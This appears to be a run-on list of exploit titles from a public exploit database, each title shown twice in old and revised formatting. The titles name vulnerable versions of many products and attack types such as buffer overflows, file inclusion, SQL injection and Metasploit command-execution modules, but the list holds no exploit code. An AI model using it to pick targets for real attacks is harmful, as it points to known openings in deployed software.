Worldweaver DX Studio Player 3.0.29 - shell.execute() Command Execution (Metasploit) Worldweaver DX Studio Player 3.0.29 - 'shell.execute()' Command Execution (Metasploit) Zenturi ProgramChecker ActiveX - Control Arbitrary File Download (Metasploit) Zenturi ProgramChecker - ActiveX Control Arbitrary File Download (Metasploit) CA BrightStor ARCserve Backup - AddColumn() ActiveX Buffer Overflow (Metasploit) Microsoft Internet Explorer - createTextRange() Code Execution (MS06-013) (Metasploit) CA BrightStor ARCserve Backup - 'AddColumn()' ActiveX Buffer Overflow (Metasploit) Microsoft Internet Explorer - 'createTextRange()' Code Execution (MS06-013) (Metasploit) AOL Radio AmpX - ActiveX Control ConvertFile() Buffer Overflow (Metasploit) AOL Radio AmpX - 
ActiveX Control 'ConvertFile()' Buffer Overflow (Metasploit) NCTAudioFile2 2.x - ActiveX Control SetFormatLikeSample() Buffer Overflow (Metasploit) NCTAudioFile2 2.x - ActiveX Control 'SetFormatLikeSample()' Buffer Overflow (Metasploit) SasCam Webcam Server 2.6.5 - Get() method Buffer Overflow (Metasploit) SasCam Webcam Server 2.6.5 - 'Get()' Method Buffer Overflow (Metasploit) Microsoft DNS RPC Service - extractQuotedChar() TCP Overflow (MS07-029) (Metasploit) Microsoft DNS RPC Service - 'extractQuotedChar()' TCP Overflow (MS07-029) (Metasploit) httpdx - h_handlepeer() Function Buffer Overflow (Metasploit) httpdx - 'h_handlepeer()' Function Buffer Overflow (Metasploit) CA CAM (Windows x86) - log_security() Stack Buffer Overflow (Metasploit) CA CAM (Windows x86) - 'log_security()' Stack Buffer Overflow (Metasploit) Trend Micro ServerProtect 5.58 - CreateBinding() Buffer Overflow (Metasploit) Trend Micro ServerProtect 5.58 - 'CreateBinding()' Buffer Overflow (Metasploit) XtreamerPRO Media-player 2.6.0 / 2.7.0 - Multiple Vulnerabilities XtreamerPRO Media-player 2.6.0/2.7.0 - Multiple Vulnerabilities Black Ice Cover Page SDK - insecure method DownloadImageFileURL() Exploit (Metasploit) Black Ice Cover Page SDK - Insecure Method 'DownloadImageFileURL()' Exploit (Metasploit) CTEK SkyRouter 4200 / 4300 - Command Execution (Metasploit) CTEK SkyRouter 4200/4300 - Command Execution (Metasploit) Mozilla Firefox 4.0.1 - Array.reduceRight() Exploit Mozilla Firefox 4.0.1 - 'Array.reduceRight()' Exploit LotusCMS 3.0 - eval() Remote Command Execution (Metasploit) LotusCMS 3.0 - 'eval()' Remote Command Execution (Metasploit) Apache Tomcat - Remote Exploit (PUT Request) and Account Scanner Apache Tomcat - Account Scanner / 'PUT' Request Remote Exploit Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion (Remote Code Execution) Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion / Remote Code Execution McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX 
GetObject() Exploit McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX 'GetObject()' Exploit Mozilla Firefox 8/9 - AttributeChildRemoved() Use-After-Free (Metasploit) Mozilla Firefox 8/9 - 'AttributeChildRemoved()' Use-After-Free (Metasploit) RabidHamster R4 - Log Entry sprintf() Buffer Overflow (Metasploit) RabidHamster R4 - Log Entry 'sprintf()' Buffer Overflow (Metasploit) Samsung NET-i viewer - Multiple ActiveX BackupToAvi() Remote Overflow (Metasploit) Samsung NET-i viewer - Multiple ActiveX 'BackupToAvi()' Remote Overflow (Metasploit) Microsoft IIS 6.0 / 7.5 (+ PHP) - Multiple Vulnerabilities Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities Linux Kernel 2.0.30 / 2.0.35 / 2.0.36 / 2.0.37 - Blind TCP Spoofing Linux Kernel 2.0.30/2.0.35/2.0.36/2.0.37 - Blind TCP Spoofing ETL Delegate 5.9.x / 6.0.x - Buffer Overflow ETL Delegate 5.9.x/6.0.x - Buffer Overflow Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility krb_rd_req() Buffer Overflow (1) Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility krb_rd_req() Buffer Overflow (3) Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Buffer Overflow (1) Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Buffer Overflow (3) Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion (Remote Command Execution) Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion / Remote Command Execution PHP IRC Bot pbot - eval() Remote Code Execution (Metasploit) PHP IRC Bot pbot - 'eval()' Remote Code Execution (Metasploit) Icecast 1.3.7/1.3.8 - print_client() Format String Icecast 1.3.7/1.3.8 - 'print_client()' Format String FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x FTPd - glob() Buffer Overflow FreeBSD 4.2-stable ftpd - glob() Buffer Overflow Vulnerabilities OpenBSD 2.x < 2.8 ftpd - glob() Buffer Overflow FreeBSD 2.2-4.2 / 
NetBSD 1.2-4.5 / OpenBSD 2.x FTPd - 'glob()' Buffer Overflow FreeBSD 4.2-stable FTPd - 'glob()' Buffer Overflow Vulnerabilities OpenBSD 2.x < 2.8 FTPd - 'glob()' Buffer Overflow Apache Tomcat 3.2.3/3.2.4 - Source.jsp Malformed Request Information Disclosure Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Malformed Request Information Disclosure Apache Tomcat 3.2.3/3.2.4 - RealPath.jsp Malformed Request Information Disclosure Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Malformed Request Information Disclosure Working Resources BadBlue 1.7.3 - cleanSearchString() Cross-Site Scripting Working Resources BadBlue 1.7.3 - 'cleanSearchString()' Cross-Site Scripting NTR - ActiveX Control StopModule() Remote Code Execution (Metasploit) NTR - ActiveX Control 'StopModule()' Remote Code Execution (Metasploit) NTR - ActiveX Control Check() Method Buffer Overflow (Metasploit) HP Application Lifecycle Management - XGO.ocx ActiveX SetShapeNodeType() Remote Code Execution (Metasploit) NTR - ActiveX Control 'Check()' Method Buffer Overflow (Metasploit) HP Application Lifecycle Management - 'XGO.ocx' ActiveX 'SetShapeNodeType()' Remote Code Execution (Metasploit) ghttpd 1.4.x - Log() Function Buffer Overflow ghttpd 1.4.x - 'Log()' Function Buffer Overflow zkfingerd 0.9.1 - say() Format String zkfingerd 0.9.1 - 'say()' Format String Linux Kernel 2.0.x / 2.2.x / 2.4.x (FreeBSD 4.x) - Network Device Driver Frame Padding Information Disclosure Linux Kernel 2.0.x/2.2.x/2.4.x (FreeBSD 4.x) - Network Device Driver Frame Padding Information Disclosure AIX 3.x/4.x / Windows 95/98/2000/NT 4.0 / SunOS 5 gethostbyname() - Buffer Overflow AIX 3.x/4.x / Windows 95/98/2000/NT 4.0 / SunOS 5 - 'gethostbyname()' Buffer Overflow Zlib 1.1.4 - Compression Library gzprintf() Buffer Overrun (2) Zlib 1.1.4 - Compression Library 'gzprintf()' Buffer Overrun (2) BitchX 1.0 - Remote Send_CTCP() Memory Corruption BitchX 1.0 - Remote 'Send_CTCP()' Memory Corruption PoPToP PPTP 1.0/1.1.x - Negative read() Argument Remote 
Buffer Overflow PoPToP PPTP 1.0/1.1.x - Negative 'read()' Argument Remote Buffer Overflow Invision Power Board (IP.Board) 3.3.4 - Unserialize() PHP Code Execution (Metasploit) Invision Power Board (IP.Board) 3.3.4 - 'Unserialize()' PHP Code Execution (Metasploit) NetIQ Privileged User Manager 2.3.1 - ldapagnt_eval() Remote Perl Code Execution (Metasploit) NetIQ Privileged User Manager 2.3.1 - 'ldapagnt_eval()' Remote Perl Code Execution (Metasploit) Valve Software Half-Life Server 1.1.1.0 / 3.1.1.1c1 / 4.1.1.1a - Multiplayer Request Buffer Overflow Valve Software Half-Life Server 1.1.1.0/3.1.1.1c1/4.1.1.1a - Multiplayer Request Buffer Overflow WU-FTPD 2.6.2 / 2.6.0 / 2.6.1 - 'realpath()' Off-by-One Buffer Overflow FreeBSD 4.8 - realpath() Off-by-One Buffer Overflow WU-FTPD 2.6.0/2.6.1/2.6.2 - 'realpath()' Off-by-One Buffer Overflow FreeBSD 4.8 - 'realpath()' Off-by-One Buffer Overflow InduSoft Web Studio - ISSymbol.ocx InternationalSeparator() Heap Overflow (Metasploit) InduSoft Web Studio - 'ISSymbol.ocx' 'InternationalSeparator()' Heap Overflow (Metasploit) GNU Anubis 3.6.x/3.9.x - auth.c auth_ident() Function Overflow GNU Anubis 3.6.x/3.9.x - 'auth.c' 'auth_ident()' Function Overflow Rlpr 2.0 - msg() Function Multiple Vulnerabilities Rlpr 2.0 - 'msg()' Function Multiple Vulnerabilities PHP 4.x/5.0 - Strip_Tags() Function Bypass PHP 4.x/5.0 - 'Strip_Tags()' Function Bypass Movable Type 4.2x / 4.3x - Web Upgrade Remote Code Execution (Metasploit) Movable Type 4.2x/4.3x - Web Upgrade Remote Code Execution (Metasploit) NullSoft Winamp 2-5 - '.wsz' Remote Code Execution NullSoft Winamp 2.4 < 5.0.4 - '.wsz' Remote Code Execution Portable UPnP SDK - unique_service_name() Remote Code Execution (Metasploit) Portable UPnP SDK - 'unique_service_name()' Remote Code Execution (Metasploit) Novell ZENworks Configuration Management 10 SP3 / 11 SP2 - Remote Execution (Metasploit) Novell ZENworks Configuration Management 10 SP3/11 SP2 - Remote Execution (Metasploit) PHP 4/5 - 
addslashes() Null Byte Bypass PHP 4/5 - 'addslashes()' Null Byte Bypass Smail 3 - Multiple Remote and Local Vulnerabilities Smail 3 - Multiple Remote/Local Vulnerabilities SIEMENS Solid Edge ST4/ST5 WebPartHelper ActiveX - RFMSsvs!JShellExecuteEx Remote Code Execution SIEMENS Solid Edge ST4/ST5 WebPartHelper - ActiveX RFMSsvs!JShellExecuteEx Remote Code Execution Novell Zenworks Mobile Device Managment 2.6.1 / 2.7.0 - Local File Inclusion (Metasploit) Novell Zenworks Mobile Device Managment 2.6.1/2.7.0 - Local File Inclusion (Metasploit) Java Applet - Driver Manager Privileged toString() Remote Code Execution (Metasploit) Java Applet - Driver Manager Privileged 'toString()' Remote Code Execution (Metasploit) Oracle Java - storeImageArray() Invalid Array Indexing Oracle Java - 'storeImageArray()' Invalid Array Indexing PHP 4.x - tempnam() Function open_basedir Restriction Bypass PHP 4.x - 'tempnam()' Function open_basedir Restriction Bypass Oracle Java - IntegerInterleavedRaster.verify() Signed Integer Overflow Oracle Java - 'IntegerInterleavedRaster.verify()' Signed Integer Overflow Java - storeImageArray() Invalid Array Indexing (Metasploit) Java - 'storeImageArray()' Invalid Array Indexing (Metasploit) Oracle Java - BytePackedRaster.verify() Signed Integer Overflow Oracle Java - 'BytePackedRaster.verify()' Signed Integer Overflow Oracle Java - ShortComponentRaster.verify() Memory Corruption Oracle Java - 'ShortComponentRaster.verify()' Memory Corruption Apache 1.3.35 / 2.0.58 / 2.2.2 - Arbitrary HTTP Request Headers Security Apache 1.3.35/2.0.58/2.2.2 - Arbitrary HTTP Request Headers Security Python 2.5 - PyLocale_strxfrm Function Remote Information Leak Python 2.5 - 'PyLocale_strxfrm' Function Remote Information Leak PHP 4.4.4 - Zip_Entry_Read() Integer Overflow PHP 5.1.6 - Chunk_Split() Function Integer Overflow PHP 4.4.4 - 'Zip_Entry_Read()' Integer Overflow PHP 5.1.6 - 'Chunk_Split()' Function Integer Overflow PHP 5.1.6 - Imap_Mail_Compose() Function Buffer 
Overflow PHP 5.1.6 - Msg_Receive() Memory Allocation Integer Overflow PHP 5.1.6 - 'Imap_Mail_Compose()' Function Buffer Overflow PHP 5.1.6 - 'Msg_Receive()' Memory Allocation Integer Overflow Zimbra Collaboration Server 7.2.2 / 8.0.2 - Local File Inclusion (Metasploit) Zimbra Collaboration Server 7.2.2/8.0.2 - Local File Inclusion (Metasploit) Ghostscript 8.0.1/8.15 - zseticcspace() Function Buffer Overflow Ghostscript 8.0.1/8.15 - 'zseticcspace()' Function Buffer Overflow VideoCharge Studio 2.12.3.685 - GetHttpResponse() MITM Remote Code Execution VideoCharge Studio 2.12.3.685 - 'GetHttpResponse()' MITM Remote Code Execution Python socket.recvfrom_into() - Remote Buffer Overflow Python - 'socket.recvfrom_into()' Remote Buffer Overflow Vim 'mch_expand_wildcards()' - Heap Based Buffer Overflow Vim - 'mch_expand_wildcards()' Heap Based Buffer Overflow Boat Browser 8.0 / 8.0.1 - Remote Code Execution Boat Browser 8.0/8.0.1 - Remote Code Execution Lotus Mail Encryption Server 2.1.0.1 (Protector for Mail) - Local File Inclusion to Remote Code Execution (Metasploit) Lotus Mail Encryption Server 2.1.0.1 (Protector for Mail) - Local File Inclusion / Remote Code Execution (Metasploit) Pro Softnet IDrive Online Backup 3.4.0 - ActiveX SaveToFile() Arbitrary File Overwrite Pro Softnet IDrive Online Backup 3.4.0 - ActiveX 'SaveToFile()' Arbitrary File Overwrite RealVNC 4.1.0 / 4.1.1 - Authentication Bypass RealVNC 4.1.0/4.1.1 - Authentication Bypass PHP 5.5.33 / 7.0.4 - SNMP Format String PHP 5.5.33/7.0.4 - SNMP Format String Cisco ASA Software 8.x / 9.x - IKEv1 and IKEv2 Buffer Overflow Cisco ASA Software 8.x/9.x - IKEv1 / IKEv2 Buffer Overflow OpenSSHd 7.2p2 - Username Enumeration OpenSSH 7.2p2 - Username Enumeration Drupal Module Coder < 7.x-1.3 / 7.x-2.6 - Remote Code Execution (SA-CONTRIB-2016-039) Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution (SA-CONTRIB-2016-039) FreePBX 13 / 14 - Remote Command Execution / Privilege Escalation FreePBX 13/14 - Remote 
Command Execution / Privilege Escalation Subversion 1.6.6 / 1.6.12 - Code Execution Subversion 1.6.6/1.6.12 - Code Execution Ansible 2.1.4 / 2.2.1 - Command Execution Ansible 2.1.4/2.2.1 - Command Execution Piwik 2.14.0 / 2.16.0 / 2.17.1 / 3.0.1 - Superuser Plugin Upload (Metasploit) Piwik 2.14.0/2.16.0/2.17.1/3.0.1 - Superuser Plugin Upload (Metasploit) GIT 1.8.5.6 / 1.9.5 / 2.0.5 / 2.1.4/ 2.2.1 & Mercurial < 3.2.3 - Multiple Vulnerabilities (Metasploit) Ruby on Rails 4.0.x / 4.1.x / 4.2.x (Web Console v2) - Whitelist Bypass Code Execution (Metasploit) GIT 1.8.5.6/1.9.5/2.0.5/2.1.4/2.2.1 & Mercurial < 3.2.3 - Multiple Vulnerabilities (Metasploit) Ruby on Rails 4.0.x/4.1.x/4.2.x (Web Console v2) - Whitelist Bypass Code Execution (Metasploit) Easy File Sharing Web Server 7.2 - GET HTTP Request (PassWD) Buffer Overflow (SEH) Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit) Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit) UBB.Threads 6.2.x < 6.3x - One Char Brute Force Exploit vBulletin - LAST.php SQL Injection UBBCentral UBB.Threads 6.2.x < 6.3x - One Char Brute Force Exploit vBulletin - 'LAST.php' SQL Injection phpBB 1.0.0 / 2.0.10 - admin_cash.php Remote Exploit PHP 4.3.9 + phpBB 2.x - Unserialize() Remote Exploit (Compiled) phpBB 1.0.0/2.0.10 - 'admin_cash.php' Remote Exploit PHP 4.3.9 + phpBB 2.x - 'Unserialize()' Remote Exploit (Compiled) e107 - include() Remote Exploit e107 - 'include()' Remote Exploit CuteNews 1.4.0 - Shell Inject Remote Command Execution CuteNews 1.4.0 - Shell Injection / Remote Command Execution CuteNews 1.4.1 - Shell Inject Remote Command Execution CuteNews 1.4.1 - Shell Injection / Remote Command Execution WebWiz Products 1.0 / 3.06 - Login Bypass (SQL Injection) WebWiz Products 1.0/3.06 - Login Bypass (SQL Injection) NOCC Webmail 1.0 - (Local Inclusion) Remote Code Execution NOCC Webmail 1.0 - Local File Inclusion / Remote Code Execution 4Images 1.7.1 - (Local Inclusion) Remote Code Execution 4Images 1.7.1 - 
Local File Inclusion / Remote Code Execution Fast Click 1.1.3 / 2.3.8 - 'show.php' Remote File Inclusion Fast Click 1.1.3/2.3.8 - 'show.php' Remote File Inclusion UBB Threads 6.4.x < 6.5.2 - (thispath) Remote File Inclusion UBBCentral UBB.Threads 6.4.x < 6.5.2 - 'thispath' Remote File Inclusion UBB Threads 5.x / 6.x - Multiple Remote File Inclusion UBBCentral UBB.Threads 5.x/6.x - Multiple Remote File Inclusion XMB 1.9.6 Final - basename() Remote Command Execution PHPay 2.02 - 'nu_mail.inc.php' Remote mail() Injection XMB 1.9.6 Final - 'basename()' Remote Command Execution PHPay 2.02 - 'nu_mail.inc.php' 'mail()' Remote Injection Phaos 0.9.2 - basename() Remote Command Execution Phaos 0.9.2 - 'basename()' Remote Command Execution Newsscript 0.5 - Remote File Inclusion / Local File Inclusion Newsscript 0.5 - Local/Remote File Inclusion exV2 < 2.0.4.3 - extract() Remote Command Execution exV2 < 2.0.4.3 - 'extract()' Remote Command Execution KGB 1.87 - (Local Inclusion) Remote Code Execution KGB 1.87 - Local File Inclusion / Remote Code Execution UBB.Threads 6.5.1.1 - 'doeditconfig.php' Code Execution UBBCentral UBB.Threads 6.5.1.1 - 'doeditconfig.php' Code Execution Invision Gallery 2.0.7 - readfile() & SQL Injection Invision Gallery 2.0.7 - 'readfile()' / SQL Injection Flatnuke 2.5.8 - file() Privilege Escalation / Code Execution Flatnuke 2.5.8 - 'file()' Privilege Escalation / Code Execution Invision Gallery 2.0.7 (Linux) - readfile() / SQL Injection Invision Gallery 2.0.7 (Linux) - 'readfile()' / SQL Injection Imageview 5 - 'Cookie/index.php' Remote / Local File Inclusion Imageview 5 - 'Cookie/index.php' Local/Remote File Inclusion Woltlab Burning Board Lite 1.0.2 - decode_cookie() SQL Injection Woltlab Burning Board Lite 1.0.2 - 'decode_cookie()' SQL Injection PHP-Update 2.7 - 'extract()' Authentication Bypass / Shell Inject Exploit PHP-Update 2.7 - 'extract()' Authentication Bypass / Shell Injection Cacti 0.8.6i - cmd.php popen() Remote Injection Cacti 0.8.6i - 
'cmd.php' 'popen()' Remote Injection P-News 1.16 / 1.17 - 'user.dat' Remote Password Disclosure P-News 1.16/1.17 - 'user.dat' Remote Password Disclosure Woltlab Burning Board 1.0.2 / 2.3.6 - search.php SQL Injection (1) Woltlab Burning Board 1.0.2 / 2.3.6 - search.php SQL Injection (2) Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (1) Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (2) Woltlab Burning Board 1.0.2 / 2.3.6 - search.php SQL Injection (3) Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (3) Jupiter CMS 1.1.5 - 'index.php' Remote / Local File Inclusion Jupiter CMS 1.1.5 - 'index.php' Local/Remote File Inclusion PHP-Stats 0.1.9.1b - 'PHP-stats-options.php' Admin 2 exec() eExploit PHP-Stats 0.1.9.1b - 'PHP-stats-options.php' Admin 2 'exec()' Exploit MySpeach 3.0.7 - Remote / Local File Inclusion MySpeach 3.0.7 - Local/Remote File Inclusion YAAP 1.5 - __autoload() Remote File Inclusion YAAP 1.5 - '__autoload()' Remote File Inclusion Quick.Cart 2.2 - Remote File Inclusion / Local File Inclusion Remote Code Execution Quick.Cart 2.2 - Local/Remote File Inclusion / Remote Code Execution Sendcard 3.4.1 - (Local File Inclusion) Remote Code Execution Sendcard 3.4.1 - Local File Inclusion / Remote Code Execution Entertainment CMS - (Local Inclusion) Remote Command Execution Entertainment CMS - Local File Inclusion / Remote Command Execution iziContents rc6 - Remote File Inclusion / Local File Inclusion iziContents rc6 - Local/Remote File Inclusion PHP Project Management 0.8.10 - Multiple Remote File Inclusion / Local File Inclusion Vulnerabilities PHP Project Management 0.8.10 - Multiple Local/Remote File Inclusions Rayzz Script 2.0 - Remote File Inclusion / Local File Inclusion Rayzz Script 2.0 - Local/Remote File Inclusion SerWeb 2.0.0 dev1 2007-02-20 - Multiple Remote File Inclusion / Local File Inclusion Vulnerabilities SerWeb 2.0.0 dev1 2007-02-20 - Multiple Local/Remote File Inclusion Vulnerabilities SquirrelMail 
G/PGP Encryption Plugin - deletekey() Command Injection SquirrelMail G/PGP Encryption Plugin - 'deletekey()' Command Injection Agares phpAutoVideo 2.21 - Remote / Local File Inclusion Agares phpAutoVideo 2.21 - Local/Remote File Inclusion TeamCalPro 3.1.000 - Multiple Remote / Local File Inclusion TeamCalPro 3.1.000 - Multiple Local/Remote File Inclusions NetRisk 1.9.7 - Remote / Local File Inclusion NetRisk 1.9.7 - Local/Remote File Inclusion AJchat 0.10 - unset() bug SQL Injection AJchat 0.10 - 'unset()' bug SQL Injection jspwiki 2.4.104 / 2.5.139 - Multiple Vulnerabilities jspwiki 2.4.104/2.5.139 - Multiple Vulnerabilities LookStrike Lan Manager 0.9 - Remote / Local File Inclusion LookStrike Lan Manager 0.9 - Local/Remote File Inclusion ExBB 0.22 - Local / Remote File Inclusion ExBB 0.22 - Local/Remote File Inclusion HomePH Design 2.10 RC2 - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting HomePH Design 2.10 RC2 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting ourvideo CMS 9.5 - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting ourvideo CMS 9.5 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting Pivot 1.40.5 - Dreamwind load_template() Credentials Disclosure Pivot 1.40.5 - Dreamwind 'load_template()' Credentials Disclosure 1024 CMS 1.4.4 - Multiple Remote / Local File Inclusion 1024 CMS 1.4.4 - Multiple Local/Remote File Inclusion Yourownbux 3.1 / 3.2 Beta - SQL Injection Yourownbux 3.1/3.2 Beta - SQL Injection Ol BookMarks Manager 0.7.5 - Remote File Inclusion / Local File Inclusion / SQL Injection Ol BookMarks Manager 0.7.5 - Local File Inclusion / Remote File Inclusion / SQL Injection wotw 5.0 - Local / Remote File Inclusion wotw 5.0 - Local/Remote File Inclusion PHPmyGallery 1.0beta2 - Remote File Inclusion / Local File Inclusion PHPmyGallery 1.0beta2 - Local/Remote File Inclusion PHPmyGallery 1.5beta - 'common-tpl-vars.php' Local / Remote File Inclusion PHPmyGallery 1.5beta - 
'common-tpl-vars.php' Local/Remote File Inclusion ASPSiteWare Automotive Dealer 1.0 / 2.0 - SQL Injection ASPSiteWare RealtyListing 1.0 / 2.0 - SQL Injection ASPSiteWare Automotive Dealer 1.0/2.0 - SQL Injection ASPSiteWare RealtyListing 1.0/2.0 - SQL Injection phpskelsite 1.4 - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting phpskelsite 1.4 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting PlaySms 0.9.3 - Multiple Remote / Local File Inclusion PlaySms 0.9.3 - Multiple Local/Remote File Inclusions Simple Machines Forum (SMF) 1.0.13 / 1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass Simple Machines Forum (SMF) 1.0.13/1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass phpList 2.10.x - (Remote Code Execution by environ Inclusion) Local File Inclusion phpList 2.10.x - Remote Code Execution / Local File Inclusion GNUBoard 4.31.04 (09.01.30) - Multiple Local+Remote Vulnerabilities GNUBoard 4.31.04 (09.01.30) - Local/Remote Multiple Vulnerabilities OpenHelpDesk 1.0.100 - eval() Code Execution (Metasploit) OpenHelpDesk 1.0.100 - 'eval()' Code Execution (Metasploit) Wili-CMS 0.4.0 - Remote File Inclusion / Local File Inclusion / Authentication Bypass Wili-CMS 0.4.0 - Local File Inclusion / Remote File Inclusion / Authentication Bypass PHP Director 0.21 - (SQL into outfile) eval() Injection PHP Director 0.21 - (SQL Into Outfile) 'eval()' Injection UBB.Threads 5.5.1 - (message) SQL Injection UBBCentral UBB.Threads 5.5.1 - 'message' SQL Injection Geeklog 1.5.2 - SEC_authenticate() SQL Injection Geeklog 1.5.2 - 'SEC_authenticate()' SQL Injection WebPortal CMS 0.8b - Multiple Remote / Local File Inclusion WebPortal CMS 0.8b - Multiple Local/Remote File Inclusions PHP recommend 1.3 - Authentication Bypass / Remote File Inclusion / Code Inject Bitweaver 2.6 - saveFeed() Remote Code Execution PHP recommend 1.3 - Authentication Bypass / Remote File Inclusion / Code Injection Bitweaver 2.6 - 'saveFeed()' Remote Code Execution School 
Data Navigator - (page) Local / Remote File Inclusion School Data Navigator - 'page' Local/Remote File Inclusion phpCollegeExchange 0.1.5c - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting phpCollegeExchange 0.1.5c - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting ClearContent - 'image.php url' Remote File Inclusion / Local File Inclusion ClearContent - 'image.php url' Local/Remote File Inclusion e107 Plugin my_gallery 2.4.1 - readfile() Local File Disclosure e107 Plugin my_gallery 2.4.1 - 'readfile()' Local File Disclosure skadate dating - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting skadate dating - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting Ultrize TimeSheet 1.2.2 - readfile() Local File Disclosure Ultrize TimeSheet 1.2.2 - 'readfile()' Local File Disclosure aa33code 0.0.1 - (Local File Inclusion / Authentication Bypass/File Disclosure) Multiple Remote Vulnerabilities aa33code 0.0.1 - (Local File Inclusion / Authentication Bypass / File Disclosure) Multiple Remote Vulnerabilities Facil Helpdesk - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiples Remote Vulnerabilities IsolSoft Support Center 2.5 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiples Vulnerabilities Facil Helpdesk - (Local File Inclusion / Remote File Inclusion / Cross-Site Scripting) Multiples Remote Vulnerabilities IsolSoft Support Center 2.5 - (Local File Inclusion / Remote File Inclusion / Cross-Site Scripting) Multiples Vulnerabilities ZeroBoard 4.1 pl7 - now_connect() Remote Code Execution ZeroBoard 4.1 pl7 - 'now_connect()' Remote Code Execution DedeCMS 5.1 - SQL Injection DeDeCMS 5.1 - SQL Injection TwonkyMedia Server 4.4.17 / 5.0.65 - Cross-Site Scripting TwonkyMedia Server 4.4.17/5.0.65 - Cross-Site Scripting Xerver 4.31 / 4.32 - HTTP Response Splitting Xerver 4.31/4.32 - HTTP Response Splitting sugar crm 5.5.0.rc2 / 5.2.0j - Multiple 
Vulnerabilities Sugar CRM 5.5.0.rc2/5.2.0j - Multiple Vulnerabilities Quate CMS 0.3.5 - Remote File Inclusion / Local File Inclusion Quate CMS 0.3.5 - Local/Remote File Inclusion Invision Power Board 3.0.4 / 3.0.4 / 2.3.6 - Local File Inclusion / SQL Injection UBB.Threads 7.5.4 2 - Multiple File Inclusion Invision Power Board 2.3.6/3.0.4 - Local File Inclusion / SQL Injection UBBCentral UBB.Threads 7.5.4 2 - Multiple File Inclusion NAS Uploader 1.0 / 1.5 - Arbitrary File Upload NAS Uploader 1.0/1.5 - Arbitrary File Upload Pandora FMS Monitoring Application 2.1.x / 3.x - SQL Injection Pandora FMS Monitoring Application 2.1.x /3.x - SQL Injection UBB Threads 6.0 - Remote File Inclusion UBBCentral UBB.Threads 6.0 - Remote File Inclusion fileNice PHP file browser - Remote File Inclusion / Local File Inclusion fileNice PHP file browser - Local/Remote File Inclusion Pay Per Minute Video Chat Script 2.0 / 2.1 - Multiple Vulnerabilities Pay Per Minute Video Chat Script 2.0/2.1 - Multiple Vulnerabilities ProfitCode Shopping Cart - Multiple Local File Inclusion / Remote File Inclusion Vulnerabilities ProfitCode Shopping Cart - Multiple Local/Remote File Inclusion Vulnerabilities Izumi 1.1.0 - (Remote File Inclusion / Local File Inclusion) Multiple Include Izumi 1.1.0 - (Local File Inclusion / Remote File Inclusion) Multiple Include TSOKA:CMS 1.1 / 1.9 / 2.0 - SQL Injection / Cross-Site Scripting TSOKA:CMS 1.1/1.9/2.0 - SQL Injection / Cross-Site Scripting Facil-CMS 0.1RC2 - Local / Remote File Inclusion Facil-CMS 0.1RC2 - Local/Remote File Inclusion jevoncms - Local File Inclusion / Remote File Inclusion jevoncms - Local/Remote File Inclusion Vieassociative Openmairie 1.01 Beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion Vieassociative Openmairie 1.01 Beta - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions Openurgence vaccin 1.03 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion Police Municipale Open 
Main Courante 1.01beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion Openurgence vaccin 1.03 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions Police Municipale Open Main Courante 1.01beta - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions Openscrutin 1.03 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion Openscrutin 1.03 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions Openreglement 1.04 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion Openreglement 1.04 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions Openregistrecil 1.02 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion Openregistrecil 1.02 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions Openplanning 1.00 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion Openfoncier 2.00 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion Madirish Webmail 2.01 - 'baseDir' Remote File Inclusion / Local File Inclusion Openplanning 1.00 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions Openfoncier 2.00 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions Madirish Webmail 2.01 - 'baseDir' Local/Remote File Inclusion Opencourrier 2.03beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion Opencourrier 2.03beta - (Local File Inclusion / Remote File Inclusion) 